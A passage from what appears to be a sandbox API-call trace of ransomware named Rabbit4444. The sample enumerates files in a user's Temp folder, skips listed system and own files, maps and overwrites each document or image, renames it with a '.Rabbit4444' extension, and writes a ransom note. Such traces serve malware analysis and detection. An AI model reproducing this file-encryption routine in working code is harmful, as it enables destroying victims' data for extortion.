lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0055.691] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.691] CloseHandle (hObject=0x298) returned 1 [0055.691] CloseHandle (hObject=0x278) returned 1 [0055.692] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\X2hoDzalyI1 oZ3p1skU.odt.Rabbit4444") returned 70 [0055.692] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\X2hoDzalyI1 oZ3p1skU.odt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\x2hodzalyi1 oz3p1sku.odt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\X2hoDzalyI1 oZ3p1skU.odt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\x2hodzalyi1 oz3p1sku.odt.rabbit4444"), dwFlags=0x1) returned 1 [0055.692] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c56910, ftCreationTime.dwHighDateTime=0x1d4cc68, ftLastAccessTime.dwLowDateTime=0x818b15a0, ftLastAccessTime.dwHighDateTime=0x1d4c803, ftLastWriteTime.dwLowDateTime=0x818b15a0, ftLastWriteTime.dwHighDateTime=0x1d4c803, nFileSizeHigh=0x0, nFileSizeLow=0x1fa1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XxveXq1B_Wj6hbxcpu_e.pptx", cAlternateFileName="XXVEXQ~1.PPT")) returned 1 [0055.692] lstrcmpiW (lpString1="XxveXq1B_Wj6hbxcpu_e.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.692] lstrcmpiW (lpString1="XxveXq1B_Wj6hbxcpu_e.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.692] lstrcmpiW (lpString1="XxveXq1B_Wj6hbxcpu_e.pptx", lpString2="Rabbit4444.exe") returned 1 [0055.692] lstrcmpiW (lpString1="XxveXq1B_Wj6hbxcpu_e.pptx", lpString2=".") returned 1 [0055.692] lstrcmpiW (lpString1="XxveXq1B_Wj6hbxcpu_e.pptx", lpString2="..") returned 1 [0055.693] lstrcmpiW (lpString1="XxveXq1B_Wj6hbxcpu_e.pptx", lpString2="windows") returned 1 [0055.693] lstrcmpiW (lpString1="XxveXq1B_Wj6hbxcpu_e.pptx", lpString2="bootmgr") returned 1 [0055.693] lstrcmpiW (lpString1="XxveXq1B_Wj6hbxcpu_e.pptx", lpString2="pagefile.sys") returned 1 [0055.693] lstrcmpiW (lpString1="XxveXq1B_Wj6hbxcpu_e.pptx", lpString2="boot") returned 1 [0055.693] lstrcmpiW (lpString1="XxveXq1B_Wj6hbxcpu_e.pptx", lpString2="ids.txt") returned 1 [0055.693] lstrcmpiW (lpString1="XxveXq1B_Wj6hbxcpu_e.pptx", lpString2="NTUSER.DAT") returned 1 [0055.693] lstrcpyW (in: lpString1=0x130eb7e, lpString2="XxveXq1B_Wj6hbxcpu_e.pptx" | out: lpString1="XxveXq1B_Wj6hbxcpu_e.pptx") returned="XxveXq1B_Wj6hbxcpu_e.pptx" [0055.693] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\XxveXq1B_Wj6hbxcpu_e.pptx", dwFileAttributes=0x0) returned 1 [0055.693] lstrlenW (lpString="XxveXq1B_Wj6hbxcpu_e.pptx") returned 25 [0055.693] lstrlenW (lpString="Rabbit4444") returned 10 [0055.693] lstrcmpiW (lpString1="cpu_e.pptx", lpString2="Rabbit4444") returned -1 [0055.693] lstrlenW (lpString=".dll") returned 4 [0055.693] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0055.693] lstrlenW (lpString=".lnk") returned 4 [0055.693] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0055.693] lstrlenW (lpString=".ini") returned 4 [0055.693] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0055.693] lstrlenW (lpString=".sys") returned 4 [0055.693] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0055.693] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\XxveXq1B_Wj6hbxcpu_e.pptx" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\xxvexq1b_wj6hbxcpu_e.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.693] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.693] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14700414440) returned 1 [0055.693] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8097) returned 1 [0055.693] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0055.694] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0055.694] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x22b0, lpName=0x0) returned 0x298 [0055.694] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x22b0) returned 0x70000 [0055.695] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.695] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0055.695] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.695] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0055.695] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.695] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0055.695] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.695] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0055.695] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14700584089) returned 1 [0055.695] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0055.695] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0055.695] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.695] CloseHandle (hObject=0x298) returned 1 [0055.695] CloseHandle (hObject=0x278) returned 1 [0055.696] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\XxveXq1B_Wj6hbxcpu_e.pptx.Rabbit4444") returned 71 [0055.696] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\XxveXq1B_Wj6hbxcpu_e.pptx" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\xxvexq1b_wj6hbxcpu_e.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\XxveXq1B_Wj6hbxcpu_e.pptx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\xxvexq1b_wj6hbxcpu_e.pptx.rabbit4444"), dwFlags=0x1) returned 1 [0055.696] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c1f7900, ftCreationTime.dwHighDateTime=0x1d4c5a1, ftLastAccessTime.dwLowDateTime=0x15192e0, ftLastAccessTime.dwHighDateTime=0x1d4c67a, ftLastWriteTime.dwLowDateTime=0x15192e0, ftLastWriteTime.dwHighDateTime=0x1d4c67a, nFileSizeHigh=0x0, nFileSizeLow=0x132a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y2Oh-tZfDsyI.rtf", cAlternateFileName="Y2OH-T~1.RTF")) returned 1 [0055.697] lstrcmpiW (lpString1="Y2Oh-tZfDsyI.rtf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.697] lstrcmpiW (lpString1="Y2Oh-tZfDsyI.rtf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.697] lstrcmpiW (lpString1="Y2Oh-tZfDsyI.rtf", lpString2="Rabbit4444.exe") returned 1 [0055.697] lstrcmpiW (lpString1="Y2Oh-tZfDsyI.rtf", lpString2=".") returned 1 [0055.697] lstrcmpiW (lpString1="Y2Oh-tZfDsyI.rtf", lpString2="..") returned 1 [0055.697] lstrcmpiW (lpString1="Y2Oh-tZfDsyI.rtf", lpString2="windows") returned 1 [0055.697] lstrcmpiW (lpString1="Y2Oh-tZfDsyI.rtf", lpString2="bootmgr") returned 1 [0055.697] lstrcmpiW (lpString1="Y2Oh-tZfDsyI.rtf", lpString2="pagefile.sys") returned 1 [0055.697] lstrcmpiW (lpString1="Y2Oh-tZfDsyI.rtf", lpString2="boot") returned 1 [0055.697] lstrcmpiW (lpString1="Y2Oh-tZfDsyI.rtf", lpString2="ids.txt") returned 1 [0055.697] lstrcmpiW (lpString1="Y2Oh-tZfDsyI.rtf", lpString2="NTUSER.DAT") returned 1 [0055.697] lstrcpyW (in: lpString1=0x130eb7e, lpString2="Y2Oh-tZfDsyI.rtf" | out: lpString1="Y2Oh-tZfDsyI.rtf") returned="Y2Oh-tZfDsyI.rtf" [0055.697] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Y2Oh-tZfDsyI.rtf", dwFileAttributes=0x0) returned 1 [0055.697] lstrlenW (lpString="Y2Oh-tZfDsyI.rtf") returned 16 [0055.697] lstrlenW (lpString="Rabbit4444") returned 10 [0055.697] lstrcmpiW (lpString1="ZfDsyI.rtf", lpString2="Rabbit4444") returned 1 [0055.697] lstrlenW (lpString=".dll") returned 4 [0055.697] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0055.697] lstrlenW (lpString=".lnk") returned 4 [0055.697] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0055.697] lstrlenW (lpString=".ini") returned 4 [0055.697] lstrcmpiW (lpString1=".rtf", lpString2=".ini") returned 1 [0055.697] lstrlenW (lpString=".sys") returned 4 [0055.697] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0055.697] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Y2Oh-tZfDsyI.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\y2oh-tzfdsyi.rtf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.697] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.698] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14700827295) returned 1 [0055.698] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=78496) returned 1 [0055.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0055.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0055.698] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x135a0, lpName=0x0) returned 0x298 [0055.698] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x135a0) returned 0x70000 [0055.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0055.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0055.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0055.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0055.700] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14701081304) returned 1 [0055.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0055.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0055.700] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.701] CloseHandle (hObject=0x298) returned 1 [0055.701] CloseHandle (hObject=0x278) returned 1 [0055.704] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Y2Oh-tZfDsyI.rtf.Rabbit4444") returned 62 [0055.704] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Y2Oh-tZfDsyI.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\y2oh-tzfdsyi.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Y2Oh-tZfDsyI.rtf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\y2oh-tzfdsyi.rtf.rabbit4444"), dwFlags=0x1) returned 1 [0055.704] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b5141a0, ftCreationTime.dwHighDateTime=0x1d4d18a, ftLastAccessTime.dwLowDateTime=0x4ddb3880, ftLastAccessTime.dwHighDateTime=0x1d4cf9b, ftLastWriteTime.dwLowDateTime=0x4ddb3880, ftLastWriteTime.dwHighDateTime=0x1d4cf9b, nFileSizeHigh=0x0, nFileSizeLow=0xc2c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YNX4rNLsFP9VXo9.png", cAlternateFileName="YNX4RN~1.PNG")) returned 1 [0055.704] lstrcmpiW (lpString1="YNX4rNLsFP9VXo9.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.704] lstrcmpiW (lpString1="YNX4rNLsFP9VXo9.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.704] lstrcmpiW (lpString1="YNX4rNLsFP9VXo9.png", lpString2="Rabbit4444.exe") returned 1 [0055.704] lstrcmpiW (lpString1="YNX4rNLsFP9VXo9.png", lpString2=".") returned 1 [0055.704] lstrcmpiW (lpString1="YNX4rNLsFP9VXo9.png", lpString2="..") returned 1 [0055.704] lstrcmpiW (lpString1="YNX4rNLsFP9VXo9.png", lpString2="windows") returned 1 [0055.704] lstrcmpiW (lpString1="YNX4rNLsFP9VXo9.png", lpString2="bootmgr") returned 1 [0055.704] lstrcmpiW (lpString1="YNX4rNLsFP9VXo9.png", lpString2="pagefile.sys") returned 1 [0055.705] lstrcmpiW (lpString1="YNX4rNLsFP9VXo9.png", lpString2="boot") returned 1 [0055.705] lstrcmpiW (lpString1="YNX4rNLsFP9VXo9.png", lpString2="ids.txt") returned 1 [0055.705] lstrcmpiW (lpString1="YNX4rNLsFP9VXo9.png", lpString2="NTUSER.DAT") returned 1 [0055.705] lstrcpyW (in: lpString1=0x130eb7e, lpString2="YNX4rNLsFP9VXo9.png" | out: lpString1="YNX4rNLsFP9VXo9.png") returned="YNX4rNLsFP9VXo9.png" [0055.705] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\YNX4rNLsFP9VXo9.png", dwFileAttributes=0x0) returned 1 [0055.705] lstrlenW (lpString="YNX4rNLsFP9VXo9.png") returned 19 [0055.705] lstrlenW (lpString="Rabbit4444") returned 10 [0055.705] lstrcmpiW (lpString1="P9VXo9.png", lpString2="Rabbit4444") returned -1 [0055.705] lstrlenW (lpString=".dll") returned 4 [0055.705] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0055.705] lstrlenW (lpString=".lnk") returned 4 [0055.705] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0055.705] lstrlenW (lpString=".ini") returned 4 [0055.705] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0055.705] lstrlenW (lpString=".sys") returned 4 [0055.705] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0055.705] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\YNX4rNLsFP9VXo9.png" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ynx4rnlsfp9vxo9.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.705] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.705] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14701608863) returned 1 [0055.705] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=49865) returned 1 [0055.705] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0055.705] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0055.706] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc5d0, lpName=0x0) returned 0x298 [0055.706] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc5d0) returned 0x70000 [0055.707] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.707] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0055.707] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.707] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0055.707] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.707] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0055.707] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.707] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0055.707] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14701814766) returned 1 [0055.707] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0055.707] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0055.708] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.708] CloseHandle (hObject=0x298) returned 1 [0055.708] CloseHandle (hObject=0x278) returned 1 [0055.709] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\YNX4rNLsFP9VXo9.png.Rabbit4444") returned 65 [0055.709] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\YNX4rNLsFP9VXo9.png" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ynx4rnlsfp9vxo9.png"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\YNX4rNLsFP9VXo9.png.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ynx4rnlsfp9vxo9.png.rabbit4444"), dwFlags=0x1) returned 1 [0055.755] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c1677c0, ftCreationTime.dwHighDateTime=0x1d4d18e, ftLastAccessTime.dwLowDateTime=0xcdfd69e0, ftLastAccessTime.dwHighDateTime=0x1d4d36d, ftLastWriteTime.dwLowDateTime=0xcdfd69e0, ftLastWriteTime.dwHighDateTime=0x1d4d36d, nFileSizeHigh=0x0, nFileSizeLow=0x13af7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z6og.pps", cAlternateFileName="")) returned 1 [0055.755] lstrcmpiW (lpString1="z6og.pps", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.755] lstrcmpiW (lpString1="z6og.pps", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.755] lstrcmpiW (lpString1="z6og.pps", lpString2="Rabbit4444.exe") returned 1 [0055.755] lstrcmpiW (lpString1="z6og.pps", lpString2=".") returned 1 [0055.755] lstrcmpiW (lpString1="z6og.pps", lpString2="..") returned 1 [0055.755] lstrcmpiW (lpString1="z6og.pps", lpString2="windows") returned 1 [0055.755] lstrcmpiW (lpString1="z6og.pps", lpString2="bootmgr") returned 1 [0055.755] lstrcmpiW (lpString1="z6og.pps", lpString2="pagefile.sys") returned 1 [0055.755] lstrcmpiW (lpString1="z6og.pps", lpString2="boot") returned 1 [0055.755] lstrcmpiW (lpString1="z6og.pps", lpString2="ids.txt") returned 1 [0055.755] lstrcmpiW (lpString1="z6og.pps", lpString2="NTUSER.DAT") returned 1 [0055.755] lstrcpyW (in: lpString1=0x130eb7e, lpString2="z6og.pps" | out: lpString1="z6og.pps") returned="z6og.pps" [0055.755] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\z6og.pps", dwFileAttributes=0x0) returned 1 [0055.755] lstrlenW (lpString="z6og.pps") returned 8 [0055.755] lstrlenW (lpString="Rabbit4444") returned 10 [0055.755] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0055.755] lstrlenW (lpString=".dll") returned 4 [0055.755] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0055.755] lstrlenW (lpString=".lnk") returned 4 [0055.755] lstrcmpiW (lpString1=".pps", lpString2=".lnk") returned 1 [0055.755] lstrlenW (lpString=".ini") returned 4 [0055.755] lstrcmpiW (lpString1=".pps", lpString2=".ini") returned 1 [0055.755] lstrlenW (lpString=".sys") returned 4 [0055.755] lstrcmpiW (lpString1=".pps", lpString2=".sys") returned -1 [0055.755] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\z6og.pps" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\z6og.pps"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.756] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.756] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14706644447) returned 1 [0055.756] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=80631) returned 1 [0055.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0055.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0055.756] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13e00, lpName=0x0) returned 0x298 [0055.756] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13e00) returned 0x70000 [0055.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0055.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0055.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0055.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0055.758] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14706917727) returned 1 [0055.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0055.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0055.759] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.759] CloseHandle (hObject=0x298) returned 1 [0055.759] CloseHandle (hObject=0x278) returned 1 [0055.761] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\z6og.pps.Rabbit4444") returned 54 [0055.761] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\z6og.pps" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\z6og.pps"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\z6og.pps.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\z6og.pps.rabbit4444"), dwFlags=0x1) returned 1 [0055.762] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c1677c0, ftCreationTime.dwHighDateTime=0x1d4d18e, ftLastAccessTime.dwLowDateTime=0xcdfd69e0, ftLastAccessTime.dwHighDateTime=0x1d4d36d, ftLastWriteTime.dwLowDateTime=0xcdfd69e0, ftLastWriteTime.dwHighDateTime=0x1d4d36d, nFileSizeHigh=0x0, nFileSizeLow=0x13af7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z6og.pps", cAlternateFileName="")) returned 0 [0055.762] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0055.762] lstrcpyW (in: lpString1=0x130eb7e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.762] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.762] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.762] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.763] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.764] CloseHandle (hObject=0x278) returned 1 [0055.764] CloseHandle (hObject=0x27c) returned 1 [0055.764] GetCurrentThreadId () returned 0xd98 [0055.764] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf64b0 [0055.764] lstrcpynW (in: lpString1=0x130eb38, 